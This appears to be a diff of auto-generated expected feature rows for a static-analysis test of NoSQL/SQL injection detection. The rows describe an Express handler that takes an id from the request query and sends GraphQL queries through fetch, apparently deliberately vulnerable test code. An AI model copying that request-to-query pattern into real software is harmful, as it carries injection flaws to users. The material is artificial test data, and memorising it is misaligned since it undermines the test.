autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:3:112:4 | fetch(" ... })\\n }) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:3:112:4 | fetch(" ... })\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:3:112:4 | fetch(" ... })\\n }) | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:3:112:4 | fetch(" ... })\\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:3:112:4 | fetch(" ... })\\n }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:9:94:47 | "https: ... raphql" | CalleeFlexibleAccessPath | fetch | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:9:94:47 | "https: ... raphql" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:9:94:47 | "https: ... raphql" | contextFunctionInterfaces | hello() | @@ -517,6 +2938,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:50:112:3 | {\\n m ... })\\n } | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:50:112:3 | {\\n m ... })\\n } | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:50:112:3 | {\\n m ... })\\n } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:5:95:10 | method | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:5:95:10 | method | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:5:95:10 | method | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:5:95:10 | method | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:5:95:10 | method | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:5:95:18 | method: "POST" | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:5:95:18 | method: "POST" | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:5:95:18 | method: "POST" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:5:95:18 | method: "POST" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:5:95:18 | method: "POST" | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:5:95:18 | method: "POST" | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:5:95:18 | method: "POST" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:5:95:18 | method: "POST" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:5:95:18 | method: "POST" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:5:95:18 | method: "POST" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:13:95:18 | "POST" | CalleeFlexibleAccessPath | fetch | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:13:95:18 | "POST" | InputAccessPathFromCallee | 1.method | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:13:95:18 | "POST" | InputArgumentIndex | 1 | @@ -526,6 +2962,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:13:95:18 | "POST" | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:13:95:18 | "POST" | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:95:13:95:18 | "POST" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:5:96:11 | headers | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:5:96:11 | headers | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:5:96:11 | headers | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:5:96:11 | headers | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:5:96:11 | headers | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:5:98:5 | headers ... "\\n } | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:5:98:5 | headers ... "\\n } | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:5:98:5 | headers ... "\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:5:98:5 | headers ... "\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:5:98:5 | headers ... "\\n } | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:5:98:5 | headers ... "\\n } | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:5:98:5 | headers ... "\\n } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:5:98:5 | headers ... "\\n } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:5:98:5 | headers ... "\\n } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:5:98:5 | headers ... "\\n } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:14:98:5 | {\\n ... "\\n } | CalleeFlexibleAccessPath | fetch | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:14:98:5 | {\\n ... "\\n } | InputAccessPathFromCallee | 1.headers | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:14:98:5 | {\\n ... "\\n } | InputArgumentIndex | 1 | @@ -535,6 +2986,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:14:98:5 | {\\n ... "\\n } | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:14:98:5 | {\\n ... "\\n } | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:96:14:98:5 | {\\n ... "\\n } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:7:97:20 | "Content-Type" | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:7:97:20 | "Content-Type" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:7:97:20 | "Content-Type" | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:7:97:20 | "Content-Type" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:7:97:20 | "Content-Type" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:7:97:40 | "Conten ... n/json" | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:7:97:40 | "Conten ... n/json" | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:7:97:40 | "Conten ... n/json" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:7:97:40 | "Conten ... n/json" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:7:97:40 | "Conten ... n/json" | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:7:97:40 | "Conten ... n/json" | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:7:97:40 | "Conten ... n/json" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:7:97:40 | "Conten ... n/json" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:7:97:40 | "Conten ... n/json" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:7:97:40 | "Conten ... n/json" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:23:97:40 | "application/json" | CalleeFlexibleAccessPath | fetch | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:23:97:40 | "application/json" | InputAccessPathFromCallee | 1.headers.Content-Type | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:23:97:40 | "application/json" | InputArgumentIndex | 1 | @@ -544,6 +3010,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:23:97:40 | "application/json" | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:23:97:40 | "application/json" | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:97:23:97:40 | "application/json" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:5:99:8 | body | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:5:99:8 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:5:99:8 | body | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:5:99:8 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:5:99:8 | body | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:5:111:6 | body: J ... \\n }) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:5:111:6 | body: J ... \\n }) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:5:111:6 | body: J ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:5:111:6 | body: J ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:5:111:6 | body: J ... \\n }) | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:5:111:6 | body: J ... \\n }) | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:5:111:6 | body: J ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:5:111:6 | body: J ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:5:111:6 | body: J ... \\n }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:5:111:6 | body: J ... \\n }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:99:14 | JSON | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:99:14 | JSON | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:99:14 | JSON | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:99:14 | JSON | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:99:14 | JSON | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:99:24 | JSON.stringify | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:99:24 | JSON.stringify | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:99:24 | JSON.stringify | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:99:24 | JSON.stringify | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:99:24 | JSON.stringify | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:111:6 | JSON.st ... \\n }) | CalleeFlexibleAccessPath | fetch | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:111:6 | JSON.st ... \\n }) | InputAccessPathFromCallee | 1.body | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:111:6 | JSON.st ... \\n }) | InputArgumentIndex | 1 | @@ -553,6 +3044,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:111:6 | JSON.st ... \\n }) | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:111:6 | JSON.st ... \\n }) | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:111:6 | JSON.st ... \\n }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:111:6 | exceptional return of JSON.st ... \\n }) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:111:6 | exceptional return of JSON.st ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:111:6 | exceptional return of JSON.st ... \\n }) | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:111:6 | exceptional return of JSON.st ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:11:111:6 | exceptional return of JSON.st ... \\n }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:16:99:24 | stringify | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:16:99:24 | stringify | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:16:99:24 | stringify | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:16:99:24 | stringify | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:16:99:24 | stringify | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:26:111:5 | {\\n ... }\\n } | CalleeFlexibleAccessPath | JSON.stringify | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:26:111:5 | {\\n ... }\\n } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:26:111:5 | {\\n ... }\\n } | contextFunctionInterfaces | hello() | @@ -561,6 +3062,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:26:111:5 | {\\n ... }\\n } | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:26:111:5 | {\\n ... }\\n } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:99:26:111:5 | {\\n ... }\\n } | receiverName | JSON | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:7:101:11 | query | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:7:101:11 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:7:101:11 | query | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:7:101:11 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:7:101:11 | query | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:7:107:8 | query: ... }` | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:7:107:8 | query: ... }` | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:7:107:8 | query: ... }` | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:7:107:8 | query: ... }` | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:7:107:8 | query: ... }` | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:7:107:8 | query: ... }` | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:7:107:8 | query: ... }` | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:7:107:8 | query: ... }` | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:7:107:8 | query: ... }` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:7:107:8 | query: ... }` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:14:107:8 | `{\\n ... }` | CalleeFlexibleAccessPath | JSON.stringify | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:14:107:8 | `{\\n ... }` | InputAccessPathFromCallee | 0.query | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:14:107:8 | `{\\n ... }` | InputArgumentIndex | 0 | @@ -570,6 +3086,27 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:14:107:8 | `{\\n ... }` | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:14:107:8 | `{\\n ... }` | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:14:107:8 | `{\\n ... }` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:15:107:7 | {\\n ... } | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:15:107:7 | {\\n ... } | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:15:107:7 | {\\n ... } | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:15:107:7 | {\\n ... } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:15:107:7 | {\\n ... } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:101:15:107:7 | {\\n ... } | stringConcatenatedWith | -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:7:108:15 | variables | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:7:108:15 | variables | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:7:108:15 | variables | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:7:108:15 | variables | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:108:7:108:15 | variables | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| 